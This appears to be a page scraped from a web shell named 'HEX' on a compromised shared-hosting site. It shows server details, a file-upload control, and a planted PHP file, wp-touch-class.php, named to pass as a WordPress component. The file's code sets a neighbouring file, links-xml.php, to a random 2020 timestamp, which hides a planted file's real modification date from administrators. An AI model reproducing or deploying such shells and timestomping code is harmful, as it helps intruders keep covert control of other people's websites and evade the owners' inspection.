HEX
Server: Apache/2.4.63 (Unix)
System: Linux terek.beget.ru 5.10.258-0-beget-acl #1 SMP Mon Jun 8 11:35:04 UTC 2026 x86_64
User: pgromoxq (7066)
PHP: 7.4.33
Disabled: NONE
Upload Files
File: /home/p/pgromoxq/uzn.pgromoxq.beget.tech/public_html/wp-touch-class.php
<?php
$f = dirname(__FILE__) . '/links-xml.php';
if (is_file($f)) {
    $ts = mktime(mt_rand(0,23), mt_rand(0,59), mt_rand(0,59), mt_rand(1,12), mt_rand(1,28), 2020);
    @touch($f, $ts, $ts);
    echo '1';
} else {
    echo '0';
}